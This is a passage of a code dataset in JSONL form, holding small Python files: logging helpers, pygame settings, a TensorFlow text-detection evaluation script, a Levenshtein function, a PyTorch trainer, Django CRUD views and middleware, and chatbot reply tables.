tornado.ioloop.IOLoop.current().start()\n\n","sub_path":"GUI/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"580076267","text":"#To find the largest and smallest element in an array\r\ndef large_small(arr):\r\n large=arr[0]\r\n small=arr[0]\r\n for i in range(len(arr)):\r\n if arr[i]>large:\r\n large=arr[i]\r\n elif arr[i]<small:\r\n small=arr[i]\r\n print(\"largest element is\", large)\r\n print(\"smallest element is\", small)\r\n \r\narr=[34,76,90,89,56,98]\r\nlarge_small(arr)\r\n\r\n","sub_path":"large_min.py","file_name":"large_min.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
+{"seq_id":"207589592","text":"\n# Python's built in logging\nimport logging\n\n\n# Module attributes\nconsole_logging_enabled = True\nconsole_log_level = logging.INFO\nfile_logging_enabled = True\nfile_log_level = logging.DEBUG\nfile_name = 'pysf.log'\n\n\n\n# Create a base class\nclass LoggingHandler:\n \"\"\"The summary line for a class docstring should fit on one line.\n\n If the class has public attributes, they may be documented here\n in an ``Attributes`` section and follow the same formatting as a\n function's ``Args`` section. Alternatively, attributes may be documented\n inline with the attribute's declaration (see __init__ method below).\n\n Properties created with the ``@property`` decorator should be documented\n in the property's getter method.\n\n Attributes:\n attr1 (str): Description of `attr1`.\n attr2 (:obj:`int`, optional): Description of `attr2`.\n\n \"\"\" \n def __init__(self, *args, **kwargs):\n # Set up logger with the default level of DEBUG, to let everything through.\n self.initLogger()\n \n def initLogger(self, loggerLevel=logging.DEBUG):\n # This gets the class name for the logger: \n # https://stackoverflow.com/questions/7385037/how-do-i-get-the-name-of-the-class-containing-a-logging-call-in-python\n logger = logging.getLogger(self.__class__.__name__)\n logger.setLevel(loggerLevel)\n logger.handlers = []\n\n if (console_logging_enabled):\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n consoleHandler.setLevel(console_log_level)\n logger.addHandler(consoleHandler)\n \n if (file_logging_enabled):\n fileHandler = logging.FileHandler(file_name) # appends by default\n fileHandler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n fileHandler.setLevel(file_log_level)\n logger.addHandler(fileHandler)\n \n self.log = logger\n \n def debug(self, *args, **kwargs):\n self.log.debug(*args, **kwargs)\n \n def info(self, *args, **kwargs):\n self.log.info(*args, **kwargs)\n \n def warning(self, *args, **kwargs):\n self.log.warning(*args, **kwargs)\n \n def error(self, *args, **kwargs):\n self.log.error(*args, **kwargs)\n \n \n# Does nothing special, we're just extending LoggingHandler so we have an \n# obvious class name (\"GlobalLogger\") to tie global logging statements to.\nclass GlobalLogger(LoggingHandler):\n def __init__(self):\n super(GlobalLogger, self).__init__()\n \n \n \n# (Where in other languages we would use a singleton object for this,\n# the Pythonic way is to use a module-bound variable)\nglobal_logger = GlobalLogger()\n\n\n ","sub_path":"pysf/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"430486170","text":"import pygame as pg\n\nvec = pg.math.Vector2\n# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nDARKGREY = (40, 40, 40)\nLIGHTGREY = (100, 100, 100)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nBROWN = (106, 55, 5)\nCYAN = (0, 255, 255)\n\n# game settings\nWIDTH = 1024 # 16 * 64 or 32 * 32 or 64 * 16\nHEIGHT = 768 # 16 * 48 or 32 * 24 or 64 * 12\nFPS = 60\nTITLE = \"Tilemap Demo\"\nBGCOLOR = BROWN\n\nTILESIZE = 64\nGRIDWIDTH = WIDTH / TILESIZE\nGRIDHEIGHT = HEIGHT / TILESIZE\n\n# Player settings\nPLAYER_HEALTH = 100\nPLAYER_SPEED = 300\nPLAYER_IMG = 'manBlue_gun.png'\nPLAYER_HIT_RECT = pg.Rect(0, 0, 35, 35)\n# KICKBACK = 200\n\nWALL_IMG = 
'tileGreen_39.png'\n\nMOB_IMG = 'zombie1_hold.png'\nMOB_SPEEDS = [150, 100, 75, 125]\nMOB_HEALTH = 100\nMOB_HIT_RECT = pg.Rect(0, 0, 30, 30)\nMOB_DAMAGE = 10\nMOB_KNOCKBACK = 20\nAVOID_RADIUS = 50\nDETECT_RADIUS = 400\nSPLAT = 'splat green.png'\nFLASH_DURATION = 50\nDAMAGE_ALPHA = [i for i in range(0, 255, 55)]\nNIGHT_COLOR = (20, 20, 20)\nLIGHT_RADIUS = (600, 600)\nLIGHT_MASK = \"light_350_med.png\"\n\nBULLET_IMG = 'bullet.png'\nWEAPONS = {}\nWEAPONS['pistol'] = {'bullet_speed': 500,\n 'bullet_lifetime': 1000, # 一秒后消失\n 'rate': 250,\n 'kickback': 200,\n 'spread': 5,\n 'damage': 10,\n 'bullet_size': 'lg',\n 'bullet_count': 1}\nWEAPONS['shotgun'] = {'bullet_speed': 400,\n 'bullet_lifetime': 500,\n 'rate': 900,\n 'kickback': 300,\n 'spread': 20,\n 'damage': 5,\n 'bullet_size': 'sm',\n 'bullet_count': 12}\nBARREL_OFFSET = vec(30, 10)\n\nMUZZLE_FLASHES = ['whitePuff15.png', 'whitePuff16.png', 'whitePuff17.png', 'whitePuff18.png', ]\n\nWALL_LAYER = 1\nPLAYER_LAYER = 2\nBULLET_LAYER = 3\nMOB_LAYER = 2\nEFFECTS_LAYER = 4\nITEMS_LAYER = 1\n\nITEM_IMAGES = {'health': 'health_pack.png', 'shotgun': 'obj_shotgun.png'}\nHEALTH_PACK_AMOUNT = 20\nBOB_RANGE = 10\nBOB_SPEED = 0.3\n\n# Sounds\nBG_MUSIC = 'espionage.ogg'\nPLAYER_HIT_SOUNDS = ['pain/8.wav', 'pain/9.wav', 'pain/10.wav', 'pain/11.wav']\nZOMBIE_MOAN_SOUNDS = ['brains2.wav', 'brains3.wav', 'zombie-roar-1.wav', 'zombie-roar-2.wav',\n 'zombie-roar-3.wav', 'zombie-roar-5.wav', 'zombie-roar-6.wav', 'zombie-roar-7.wav']\nZOMBIE_HIT_SOUNDS = ['splat-15.wav']\nWEAPON_SOUNDS = {'pistol': ['pistol.wav'],\n 'shotgun': ['shotgun.wav']}\nEFFECTS_SOUNDS = {'level_start': 'level_start.wav',\n 'health_up': 'health_pack.wav',\n 'gun_pickup': 'gun_pickup.wav'}\n","sub_path":"Tilemap/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"148193110","text":"import turtle\n\nwn = turtle.Screen()\nwn.bgcolor(\"black\")\nwn.title(\"Square\")\n\nmyPen = turtle.Turtle()\nmyPen.speed(2)\nmyPen.color(\"green\")\n\nfor i in range(4):\n myPen.forward(100)\n myPen.left(90)\n\nturtle.done()","sub_path":"Vong lap for_Ve hinh vuong.py","file_name":"Vong lap for_Ve hinh vuong.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"103749957","text":"import os\nimport logging\n\nfrom apistellar import SoloManager\n\napp_name = \"blog\"\n\n\ndef run():\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s.%(msecs)d %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s',\n datefmt='%Y/%m/%d %H:%M:%S'\n )\n SoloManager(\n app_name, current_dir=os.path.dirname(os.path.abspath(__file__))).start()\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"blog/solo_app.py","file_name":"solo_app.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195805889","text":"import math\nimport time\n\nimport numpy as np\nimport tensorflow as tf\nimport tf_extended as tfe\nimport os, os.path\nimport sys\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))\nimport load_batch\nfrom nets import nets_factory\nslim = tf.contrib.slim\n\n# =========================================================================== #\n# Some default EVAL parameters\n# =========================================================================== #\n# List of recalls 
values at which precision is evaluated.\nLIST_RECALLS = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.85,\n\t\t\t\t0.90, 0.95, 0.96, 0.97, 0.98, 0.99]\nDATA_FORMAT = 'NCHW'\n\n# =========================================================================== #\n# SSD evaluation Flags.\n# =========================================================================== #\ntf.app.flags.DEFINE_float(\n\t'select_threshold', 0.1, 'Selection threshold.')\ntf.app.flags.DEFINE_integer(\n\t'select_top_k', 400, 'Select top-k detected bounding boxes.')\ntf.app.flags.DEFINE_integer(\n\t'keep_top_k', 200, 'Keep top-k detected objects.')\ntf.app.flags.DEFINE_float(\n\t'nms_threshold', 0.45, 'Non-Maximum Selection threshold.')\ntf.app.flags.DEFINE_float(\n\t'matching_threshold', 0.5, 'Matching threshold with groundtruth objects.')\ntf.app.flags.DEFINE_integer(\n\t'eval_resize', 4, 'Image resizing: None / CENTRAL_CROP / PAD_AND_RESIZE / WARP_RESIZE.')\ntf.app.flags.DEFINE_integer(\n\t'eval_image_size', None, 'Eval image size.')\ntf.app.flags.DEFINE_boolean(\n\t'remove_difficult', True, 'Remove difficult objects from evaluation.')\ntf.app.flags.DEFINE_integer(\n\t'num_samples', 229, 'number of dataset size')\ntf.app.flags.DEFINE_string(\n 'model_name', 'text_box_300', 'The name of the architecture to evaluate.')\n\n\n# =========================================================================== #\n# Main evaluation flags.\n# =========================================================================== #\ntf.app.flags.DEFINE_integer(\n\t'num_classes', 2, 'Number of classes to use in the dataset.')\ntf.app.flags.DEFINE_integer(\n\t'batch_size', 1, 'The number of samples in each batch.')\ntf.app.flags.DEFINE_integer(\n\t'max_num_batches', None,\n\t'Max number of batches to evaluate by default use all.')\ntf.app.flags.DEFINE_string(\n\t'master', '', 'The address of the TensorFlow master to use.')\ntf.app.flags.DEFINE_string(\n\t'checkpoint_path', './checkpoints/model.ckpt-33763',\n\t'The directory where the model was written to or an absolute path to a '\n\t'checkpoint file.')\ntf.app.flags.DEFINE_string(\n\t'eval_dir', './data/eval/', 'Directory where the results are saved to.')\ntf.app.flags.DEFINE_integer(\n\t'num_readers', 4,\n\t'The number of parallel readers that read data from the dataset.')\ntf.app.flags.DEFINE_integer(\n\t'num_preprocessing_threads', 4,\n\t'The number of threads used to create the batches.')\ntf.app.flags.DEFINE_string(\n\t'dataset_dir', None, 'The directory where the dataset files are stored.')\ntf.app.flags.DEFINE_float(\n\t'moving_average_decay', None,\n\t'The decay to use for the moving average.'\n\t'If left as None, then moving averages are not used.')\ntf.app.flags.DEFINE_float(\n\t'gpu_memory_fraction', 0.08, 'GPU memory fraction to use.')\ntf.app.flags.DEFINE_string(\n\t'gpu_eval', '/cpu:0',\n\t'Which gpu to use')\ntf.app.flags.DEFINE_boolean(\n\t'wait_for_checkpoints', False, 'Wait for new checkpoints in the eval loop.')\ntf.app.flags.DEFINE_integer('shuffle_data', False,\n\t\t\t\t\t\t\t'Wheather shuffe the datasets')\ntf.app.flags.DEFINE_boolean(\n\t'use_batch', True,\n\t'Wheather use batch_norm or not')\ntf.app.flags.DEFINE_boolean(\n\t'use_whiten', True,\n\t'Wheather use whiten or not,genally you can choose whiten or batchnorm tech.')\n\n\nFLAGS = tf.app.flags.FLAGS\n\n\ndef main(_):\n\tif not FLAGS.dataset_dir:\n\t\traise ValueError('You must supply the dataset directory with --dataset_dir')\n\n\ttf.logging.set_verbosity(tf.logging.INFO)\n\twith 
tf.Graph().as_default():\n\t\ttf_global_step = slim.get_or_create_global_step()\n\n\t\t# initalize the net\n\t\tnetwork_fn = nets_factory.get_network(FLAGS.model_name)\n\t\tnet = network_fn()\n\t\tout_shape = net.params.img_shape\n\t\tout_shape = (300,300)\n\t\tanchors = net.anchors(out_shape)\n\t\t# =================================================================== #\n\t\t# Create a dataset provider and batches.\n\t\t# =================================================================== #\n\t\twith tf.device('/cpu:0'):\n\t\t\tb_image, glabels, b_gbboxes, g_bbox_img, b_glocalisations, b_gscores =\\\n\t\t\t\t\t\t\tload_batch.get_batch(FLAGS.dataset_dir,\n\t\t\t\t\t\t\t\t\t\t FLAGS.num_readers,\n\t\t\t\t\t\t\t\t\t\t FLAGS.batch_size,\n\t\t\t\t\t\t\t\t\t\t out_shape,\n\t\t\t\t\t\t\t\t\t\t net,\n\t\t\t\t\t\t\t\t\t\t anchors,\n\t\t\t\t\t\t\t\t\t\t FLAGS,\n\t\t\t\t\t\t\t\t\t\t file_pattern = '*.tfrecord',\n\t\t\t\t\t\t\t\t\t\t is_training = False,\n\t\t\t\t\t\t\t\t\t\t shuffe = FLAGS.shuffle_data)\n\t\tb_gdifficults = tf.zeros(tf.shape(glabels), dtype=tf.int64)\n\t\tdict_metrics = {}\n\t\targ_scope = net.arg_scope(data_format=DATA_FORMAT)\n\t\twith slim.arg_scope(arg_scope):\n\t\t\tlocalisations, logits, end_points = \\\n\t\t\t\tnet.net(b_image, is_training=False, use_batch=FLAGS.use_batch)\n\t\t# Add losses functions.\n\t\t#total_loss = net.losses(logits, localisations,\n\t\t#\t\t\t\t\t b_glocalisations, b_gscores)\n\t\tpredictions = []\n\t\tfor i in range(len(logits)):\n\t\t\tpredictions.append(slim.softmax(logits[i]))\n\t\t\n\t\t# Performing post-processing on CPU: loop-intensive, usually more efficient.\n\t\twith tf.device('/device:CPU:0'):\n\t\t\t# Detected objects from SSD output.\n\t\t\tlocalisations = net.bboxes_decode(localisations, anchors)\n\t\t\trscores, rbboxes = \\\n\t\t\t\tnet.detected_bboxes(predictions, localisations,\n\t\t\t\t\t\t\t\t\t\tselect_threshold=FLAGS.select_threshold,\n\t\t\t\t\t\t\t\t\t\tnms_threshold=FLAGS.nms_threshold,\n\t\t\t\t\t\t\t\t\t\tclipping_bbox=None,\n\t\t\t\t\t\t\t\t\t\ttop_k=FLAGS.select_top_k,\n\t\t\t\t\t\t\t\t\t\tkeep_top_k=FLAGS.keep_top_k)\n\t\t\t# Compute TP and FP statistics.\n\t\t\tnum_gbboxes, tp, fp, rscores = \\\n\t\t\t\ttfe.bboxes_matching_batch(rscores.keys(), rscores, rbboxes,\n\t\t\t\t\t\t\t\t\t\t glabels, b_gbboxes, b_gdifficults,\n\t\t\t\t\t\t\t\t\t\t matching_threshold=FLAGS.matching_threshold)\n\n\t\t# Variables to restore: moving avg. 
or normal weights.\n\t\tif FLAGS.moving_average_decay:\n\t\t\tvariable_averages = tf.train.ExponentialMovingAverage(\n\t\t\t\tFLAGS.moving_average_decay, tf_global_step)\n\t\t\tvariables_to_restore = variable_averages.variables_to_restore(\n\t\t\t\tslim.get_model_variables())\n\t\t\tvariables_to_restore[tf_global_step.op.name] = tf_global_step\n\t\telse:\n\t\t\tvariables_to_restore = slim.get_variables_to_restore()\n\n\t\t# =================================================================== #\n\t\t# Evaluation metrics.\n\t\t# =================================================================== #\n\t\twith tf.device(FLAGS.gpu_eval):\n\t\t\tdict_metrics = {}\n\t\t\t# Extra losses as well.\n\t\t\tfor loss in tf.get_collection('EXTRA_LOSSES'):\n\t\t\t\tdict_metrics[loss.op.name] = slim.metrics.streaming_mean(loss)\n\n\t\t\t# Add metrics to summaries and Print on screen.\n\t\t\tfor name, metric in dict_metrics.items():\n\t\t\t\t# summary_name = 'eval/%s' % name\n\t\t\t\tsummary_name = name\n\t\t\t\top = tf.summary.scalar(summary_name, metric[0], collections=[])\n\t\t\t\t# op = tf.Print(op, [metric[0]], summary_name)\n\t\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\n\t\t\t# FP and TP metrics.\n\t\t\ttp_fp_metric = tfe.streaming_tp_fp_arrays(num_gbboxes, tp, fp, rscores)\n\t\t\tfor c in tp_fp_metric[0].keys():\n\t\t\t\tdict_metrics['tp_fp_%s' % c] = (tp_fp_metric[0][c],\n\t\t\t\t\t\t\t\t\t\t\t\ttp_fp_metric[1][c])\n\n\t\t\t# Add to summaries precision/recall values.\n\t\t\ticdar2013 = {}\n\t\t\tfor c in tp_fp_metric[0].keys():\n\t\t\t\t# Precison and recall values.\n\t\t\t\tprec, rec = tfe.precision_recall(*tp_fp_metric[0][c])\n\n\t\t\t\top = tf.summary.scalar('precision', tf.reduce_mean(prec), collections=[])\n\t\t\t\t# op = tf.Print(op, [v], summary_name)\n\t\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\n\t\t\t\top = tf.summary.scalar('recall', tf.reduce_mean(rec), collections=[])\n\t\t\t\t# op = tf.Print(op, [v], summary_name)\n\t\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\n\t\t\t\t# Average precision VOC07.\n\t\t\t\tv = tfe.average_precision_voc12(prec, rec)\t\t\t\t\n\t\t\t\t#v = (prec + rec)/2.\n\t\t\t\tsummary_name = 'ICDAR13/%s' % c\n\t\t\t\top = tf.summary.scalar(summary_name, v, collections=[])\n\t\t\t\t# op = tf.Print(op, [v], summary_name)\n\t\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\t\t\t\ticdar2013[c] = v\n\n\n\t\t\t# Mean average precision VOC07.\n\t\t\tsummary_name = 'ICDAR13/mAP'\n\t\t\tmAP = tf.add_n(list(icdar2013.values())) / len(icdar2013)\n\t\t\top = tf.summary.scalar(summary_name, mAP, collections=[])\n\t\t\top = tf.Print(op, [mAP], summary_name)\n\t\t\ttf.add_to_collection(tf.GraphKeys.SUMMARIES, op)\n\n\n\t\t# Split into values and updates ops.\n\t\tnames_to_values, names_to_updates = slim.metrics.aggregate_metric_map(dict_metrics)\n\n\t\t# =================================================================== #\n\t\t# Evaluation loop.\n\t\t# =================================================================== #\n\t\tgpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_memory_fraction)\n\t\tconfig = tf.ConfigProto(log_device_placement=False, gpu_options=gpu_options)\n\t\t# config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1\n\n\t\t# Number of batches...\n\t\tif FLAGS.max_num_batches:\n\t\t\tnum_batches = FLAGS.max_num_batches\n\t\telse:\n\t\t\tnum_batches = math.ceil(FLAGS.num_samples / float(FLAGS.batch_size))\n\n\t\tif not FLAGS.wait_for_checkpoints:\n\t\t\tif 
tf.gfile.IsDirectory(FLAGS.checkpoint_path):\n\t\t\t\tcheckpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_path)\n\t\t\telse:\n\t\t\t\tcheckpoint_path = FLAGS.checkpoint_path\n\t\t\ttf.logging.info('Evaluating %s' % checkpoint_path)\n\n\t\t\t# Standard evaluation loop.\n\t\t\tstart = time.time()\n\t\t\tslim.evaluation.evaluate_once(\n\t\t\t\tmaster=FLAGS.master,\n\t\t\t\tcheckpoint_path=checkpoint_path,\n\t\t\t\tlogdir=FLAGS.eval_dir,\n\t\t\t\tnum_evals=num_batches,\n\t\t\t\teval_op=list(names_to_updates.values()),\n\t\t\t\tvariables_to_restore=variables_to_restore,\n\t\t\t\tsession_config=config)\n\t\t\t# Log time spent.\n\t\t\telapsed = time.time()\n\t\t\telapsed = elapsed - start\n\t\t\tprint('Time spent : %.3f seconds.' % elapsed)\n\t\t\tprint('Time spent per BATCH: %.3f seconds.' % (elapsed / num_batches))\n\n\t\telse:\n\t\t\tcheckpoint_path = FLAGS.checkpoint_path\n\t\t\ttf.logging.info('Evaluating %s' % checkpoint_path)\n\n\t\t\t# Waiting loop.\n\t\t\tslim.evaluation.evaluation_loop(\n\t\t\t\tmaster=FLAGS.master,\n\t\t\t\tcheckpoint_dir=checkpoint_path,\n\t\t\t\tlogdir=FLAGS.eval_dir,\n\t\t\t\tnum_evals=num_batches,\n\t\t\t\teval_op=list(names_to_updates.values()),\n\t\t\t\tvariables_to_restore=variables_to_restore,\n\t\t\t\teval_interval_secs=60,\n\t\t\t\tmax_number_of_evaluations=np.inf,\n\t\t\t\tsession_config=config,\n\t\t\t\ttimeout=None)\n\n\nif __name__ == '__main__':\n\ttf.app.run()\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":10484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"115769343","text":"import numpy as np\n\n\ndef lev (str_x, str_y):\n len_x = len(str_x) + 1\n len_y = len(str_y) + 1\n m = np.zeros((len_x, len_y))\n\n for x in range(len_x):\n m[x, 0] = x\n for y in range(len_y):\n m[0, y] = y\n # print(m)\n\n for x in range(1, len_x):\n for y in range(1, len_y):\n if str_x[x - 1] == str_y[y - 1]:\n m[x, y] = min(\n m[x, y - 1] + 1,\n m[x - 1, y - 1],\n m[x -1, y] + 1,\n )\n else:\n m[x, y] = min(\n m[x, y - 1] + 1,\n m[x - 1, y - 1] + 1,\n m[x - 1, y] + 1,\n )\n # print(m)\n return m[len_x - 1, len_y -1]\n\n\n\n# assert lev(\"Food\", \"Fool\") == 1\n# assert lev(\"Fool\", \"Feel\") == 2\n#\nprint(f\"lev('food, 'feed') = {lev('food', 'feed')}\")\nprint(f\"lev('food, 'fool') = {lev('food', 'fool')}\")\nprint(f\"lev('food, 'food') = {lev('food', 'food')}\")\nprint(f\"lev('food, 'foodstuff') = {lev('food', 'foodstuff')}\")\nprint(f\"lev('foodstuff, 'food') = {lev('foodstuff', 'food')}\")","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571093778","text":"##################\n# IMPORT MODULES #\n##################\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\nfrom utils.average_meter import AverageMeter\nfrom utils.metrics import metrics_dict\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n#################\n# TRAINER CLASS #\n#################\nclass Trainer:\n '''\n trn_function train the model for one epoch\n eval_function evaluate the current model on validation data and output current loss and other evaluation metric\n '''\n def __init__(self, model, optimizer, device, criterion):\n self.model = model\n self.optimizer = optimizer\n self.device = device\n self.criterion = criterion\n #################\n # TRAINING STEP #\n #################\n def training_step(self, data_loader):\n # LOSS AVERAGE\n 
losses = AverageMeter()\n # MODEL TO TRAIN MODE\n self.model.train()\n # TRAINING LOOP\n tk0 = tqdm(data_loader, total=len(data_loader))\n for _, data in enumerate(tk0):\n # LOADING IMAGES & LABELS\n ids = data[\"ids\"]\n masks = data[\"masks\"]\n labels = data[\"labels\"]\n ids = ids.to(self.device)\n masks = masks.to(self.device)\n labels = labels.to(self.device)\n # RESET GRADIENTS\n self.model.zero_grad()\n # CALCULATE LOSS\n output = self.model(ids, masks)\n loss = self.criterion(output, labels)\n # CALCULATE GRADIENTS\n loss.backward()\n self.optimizer.step()\n # UPDATE LOSS\n losses.update(loss.item(), ids.size(0))\n tk0.set_postfix(loss=losses.avg)\n ###################\n # VALIDATION STEP #\n ###################\n def eval_step(self, data_loader, metric, n_class):\n # LOSS & METRIC AVERAGE\n losses = AverageMeter()\n metrics_avg = AverageMeter()\n # MODEL TO EVAL MODE\n self.model.eval()\n # VALIDATION LOOP\n with torch.no_grad():\n tk0 = tqdm(data_loader, total=len(data_loader))\n for _, data in enumerate(tk0):\n # LOADING IMAGES & LABELS\n ids = data[\"ids\"]\n masks = data[\"masks\"]\n labels = data[\"labels\"]\n ids = ids.to(self.device)\n masks = masks.to(self.device)\n labels = labels.to(self.device)\n # CALCULATE LOSS & METRICS\n output = self.model(ids, masks)\n loss = self.criterion(output, labels)\n\n metric_used = metrics_dict[metric]\n predictions = torch.softmax(output, dim=1)\n _, predictions = torch.max(predictions, dim=1)\n\n metric_value = metric_used(labels, predictions, n_class)\n\n losses.update(loss.item(), ids.size(0))\n metrics_avg.update(metric_value.item(), ids.size(0))\n\n tk0.set_postfix(loss=losses.avg)\n print(f\"Validation Loss = {losses.avg}\")\n return loss, metrics_avg.avg\n","sub_path":"trainer/train_fct.py","file_name":"train_fct.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"550510680","text":"# -*- coding: utf-8 -*-\n# 引入模块\nfrom django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom .models import Article\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\n\n# 数据展示页面\ndef queryAll(request):\n b=Article.objects.all()\n return render_to_response('zsgc/queryall.html',{'data':b})\n\n# 删除数据方法\ndef delByID(request,cui_id):\n a = cui_id\n bb=Article.objects.get(id=a)\n bb.delete()\n return HttpResponseRedirect(\"/query/\")\n\n# 增加数据页面\ndef addByID(request): \n return render_to_response('zsgc/add.html')\n\n# 增加数据方法\ndef add1(request):\n title=request.POST['title']\n author=request.POST['author']\n st=Article()\n st.title=title\n st.author=author\n st.save()\n return HttpResponseRedirect(\"/query/\")\n\ndef add2(request):\n id=request.POST['id']\n title=request.POST['title']\n author=request.POST['author']\n st=Article()\n if len(id) > 0 :\n st.id=id\n st.title=title\n st.author=author\n st.save()\n return HttpResponseRedirect(\"/query/\")\n \n# 更新数据方法\ndef updateByID(request,cui_id):\n i=cui_id\n b=Article.objects.get(id=i)\n return render_to_response('zsgc/update.html',{'data':b})\n\n# 数据查询页面\ndef search1(request):\n return render_to_response('zsgc/search1.html')\n\n# 查询结构页面\ndef search2(request):\n q = request.GET['q']\n books = Article.objects.filter(title__icontains=q)\n return render_to_response('zsgc/search2.html',{'books': 
books})\n\n\n\n\n\n\n","sub_path":"zsgc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473835988","text":"import time\r\nimport logging\r\n\r\nfrom imoocdjango import settings\r\n\r\nlogger = logging.getLogger('statistics')\r\nlogger2 = logging.getLogger('django')\r\n\r\n\r\nclass StatisticsMiddleware:\r\n def __init__(self, get_response):\r\n self.get_response = get_response\r\n logger2.info('Build StatisticsMiddleware')\r\n\r\n def __call__(self, request):\r\n tick = time.time()\r\n response = self.get_response(request)\r\n path = request.path\r\n full_path = request.get_full_path()\r\n tock = time.time()\r\n cost = tock - tick\r\n content_list = []\r\n content_list.append('now=[%d]' % tock)\r\n content_list.append('path=[%s]' % path)\r\n content_list.append('full_path=[%s]' % full_path)\r\n content_list.append('cost=[%.6f]' % cost)\r\n content = settings.STATISTICS_SPLIT_FLAG.join(content_list)\r\n logger.info(content)\r\n\r\n return response\r\n\r\n","sub_path":"module/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410505846","text":"\nfrom dcicutils.ff_utils import (\n search_metadata,\n)\nfrom tibanna import create_logger\n\n\nlogger = create_logger(__name__)\n\n\nclass FormatExtensionMap(object):\n def __init__(self, ff_keys=None, ffe_all=None):\n \"\"\"connect to the server and get all fileformat search result if ff_keys\n if given. If not, use user-specified ffe_all\n \"\"\"\n if not ff_keys and not ffe_all:\n raise Exception(\"Either ff_keys or ffe_all must be specified\" + \\\n \"to create a FormatExtensionMap object\")\n if ff_keys and ffe_all:\n raise Exception(\"Either ff_keys or ffe_all must be specified but not both\" + \\\n \"to create a FormatExtensionMap object\")\n if ff_keys and not ffe_all:\n try:\n logger.debug(\"Searching in server : \" + ff_keys['server'])\n ffe_all = search_metadata(\"/search/?type=FileFormat&frame=object\", key=ff_keys)\n except Exception as e:\n raise Exception(\"Can't get the list of FileFormat objects. 
%s\\n\" % e)\n self.fe_dict = dict()\n logger.debug(\"**ffe_all = \" + str(ffe_all))\n for k in ffe_all:\n file_format = k['file_format']\n self.fe_dict[file_format] = \\\n {'standard_extension': k['standard_file_extension'],\n 'other_allowed_extensions': k.get('other_allowed_extensions', []),\n 'extrafile_formats': k.get('extrafile_formats', [])\n }\n\n def get_extension(self, file_format):\n if file_format in self.fe_dict:\n return self.fe_dict[file_format]['standard_extension']\n else:\n return None\n\n def get_other_extensions(self, file_format):\n if file_format in self.fe_dict:\n return self.fe_dict[file_format]['other_allowed_extensions']\n else:\n return []\n\n\ndef parse_formatstr(file_format_str):\n if not file_format_str:\n return None\n return file_format_str.replace('/file-formats/', '').replace('/', '')\n\n\ndef cmp_fileformat(format1, format2):\n return parse_formatstr(format1) == parse_formatstr(format2)\n","sub_path":"tibanna_ffcommon/file_format.py","file_name":"file_format.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125811113","text":"# -*- coding: utf-8 -*-\n\nLOGIC_RESPONSES = {\n \"thank\": [\n \"Of course!\",\n \"Anytime!\",\n \"You're welcome\",\n \"You are so welcome!\"\n ],\n \"thanks\": [\n \"Of course!\",\n \"Anytime!\",\n \"You're welcome\",\n \"You are so welcome!\"\n ],\n 'hey':[\n 'Hi'\n ],\n 'hello':[\n 'Hello'\n ],\n 'salam':[\n 'Salam',\n ],\n u'السلام عليكم':[\n 'وعليكم السلام ورحمة الله وبركاته'\n ],\n u'مساعدة':[\n u'أكتب الكلمة التي تريد البحث عنها وسيرد الروبوت بنتائجها'\n ],\n u'ساعدني':[\n u'أكتب الكلمة التي تريد البحث عنها وسيرد الروبوت بنتائجها'\n ],\n 'menu':[\n 'No menu for now',\n ],\n 'help': [\n u\"\"\"\nExact search:\tفأسقيناكموه\nPhrase search:\t\"رب العالمين\"\nLogical relations: سميع | 